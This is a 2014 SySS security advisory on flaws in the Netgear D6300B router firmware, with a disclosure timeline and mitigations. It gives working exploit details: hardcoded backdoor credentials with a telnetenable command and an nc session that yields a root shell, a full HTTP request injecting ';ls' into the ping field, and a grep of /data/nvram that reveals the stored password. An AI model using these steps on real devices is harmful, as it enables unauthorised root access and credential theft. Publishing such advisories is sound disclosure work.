Advisory - Netgear

2014-02-04: Advisory: Netgear

Advisory ID: SYSS-2013-001 
Product:NETGEAR Router D6300B / Firmware: V1.0.0.14_1.0.14 (latest)
Vendor: Netgear
Affected Version(s):until V1.0.0.14_1.0.14 (latest)
Tested Version(s):V1.0.0.14_1.0.14 (latest)
Vulnerability Type: Root-Shell, OS Command Injection, UPnP misconfiguration
Risk Level:High
Solution Status:None
Vendor Notification:2013-12-12
Solution Date: None
Public Disclosure:2014-02-04
CVE Reference:Not assigned
Author of Advisory:Marcel Mangold <marcel.mangold@syss.de>, Pascal Uter <pascal.uter@syss.de>
Document date:2014-02-04

Credits:

Special Thanks:

Marcel Mangold, Pascal Uter

Daniel Sauder 

 

Overview

(1) It is possible to activate a telnet root shell by sending a specifically crafted packet to the telnet service from within the LAN, WiFi, or guest WiFi. It is not possible to exploit this vulnerability over the WAN interface.

(2) The router suffers from diverse UPnP related issues. The main problem is UPnP being available from the guest wifi. The router provides file shares (if a USB flash drive is plugged-in) via HTTP, FTP, and UPnP. While the HTTP and FTP shares cannot be accessed from the guest WiFi, it is possible to access the files via UPnP from the guest WiFi. As well port forwarding can be activated out of the guest Wifi which gives an attacker the possibility to reach services only available in the private WiFi out of the guest Wifi.

(3) The web interface is vulnerable to OS Command Injections by authorized users.

(4) The web interface cannot be accessed via HTTPS. The login credentials are submitted as clear text over HTTP.

(5) The web interface login credentials are stored in clear text in the /data/nvram file. This can be exploited in combination with (1) or (3).

 

Details concerning (1), (3), (5):

(1) Port 23/TCP (telnet) of the device is open and accessible from within the LAN, WiFi, or guest WiFi. While it is possible to connect to the telnet port, the telnet service does not respond until it receives a specifically crafted packet. This packet is calculated out of the MAC address of the device, a specific constant string, a user name and a password. User name and password are: Gearguy / Geardog. To send the packet, it is possible to use the tool telnetenable.py published by Paul Gebheim in 2009:

./telnetenable.py 192.168.0.1 28C68Exxxxxx Gearguy Geardog Sent telnet enable payload to ’192.168.0.1:23’

 

Afterwards, it is possible to connect to a telnet root shell without the need of further credentials:

 

nc

192.168.0.1 23 [...]

BusyBox v1.17.2 (2013-05-02 18:01:36 CST) hush - the humble shell

Enter ’help’ for a list of built-in commands.

/ #

Note: It is not possible to use this back door from the WAN interface.

 

(3) The administrative web interface of the device is vulnerable to OS command injections. For example, it is possible to use the last field of the IP address of the ping tool in the diagnostics page, to append another OS command. The first lines of the command output are returned by the web interface.

 

######## REQUEST: #########

###########################

 

POST /diag.cgi?id=991220771 HTTP/1.1

Host: 192.168.0.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.0.1/DIAG_diag.htm

Authorization: Basic YWRtaW46cGFzc3dvcmQ=

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 95

 

ping=Ping&IPAddr1=192&IPAddr2=168&IPAddr3=0&IPAddr4=1;ls&host_name=&ping_IPAddr=192.168.0.1

 

######## RESPONSE: ########

###########################

HTTP/1.0 200 OK

Content-length: 6672

Content-type: text/html; charset="UTF-8"

Cache-Control:no-cache

Pragma:no-cache

<!DOCTYPE HTML>

<html>

[...]

<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>

bin

cferam.001

data

dev

etc

include

lib

linuxrc

mnt

opt

</textarea>

[...]

 

(5) The web interface login credentials are stored in clear text in the /data/nvram file. This can be exploited in combination with (1), the telnet back door, or (3), the OS command injection in the web interface. Here, the exploitation with the telnet back door:

 

/ # grep http_passwd /data/nvram

grep http_passwd /data/nvram

http_passwd=mywebinterfacepassword 

Solution:

(1) Wait for a new firmware.

(2) Wait for a new firmware. Disable the guest Wifi or UPnP for partical protection.

(3) Only give the web interface credentials to people you would also grant root access to the device. / Wait for a new firmware.

(4) Wait for a new firmware.

(5) Wait for a new firmware.

 

Disclosure timeline:

2013-08-02 - Flaws were discovered in firmware V1.0.0.06

2013-12-12 - Flaws were verified for firmware version V1.0.0.14

2013-12-12 - First contact to vendor

2013-12-20 - Sent this document to vendor

2014-02-03 - Public Disclosure

 

GPG:

E-Mail: marcel.mangold@syss.de

Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc

Key ID: AC15E5BE

Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE

 

E-Mail: pascal.uter@syss.de

Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Pascal_Uter.asc

Key ID: 351596DF

Key Fingerprint: D269 30F3 F7DD 2C93 95B3 951C 8C89 45B0 3515 96DF

 

Copyright:

Creative Commons - Attribution (by) - Version 3.0

URL: creativecommons.org/licenses/by/3.0/deed.en

Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de | IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99

Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer

Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de

IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99

Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer

Direkter Kontakt

+49 (0)7071 - 40 78 56-0 oder anfrage@syss.de

IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN

+49 (0)7071 - 40 78 56-99

Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer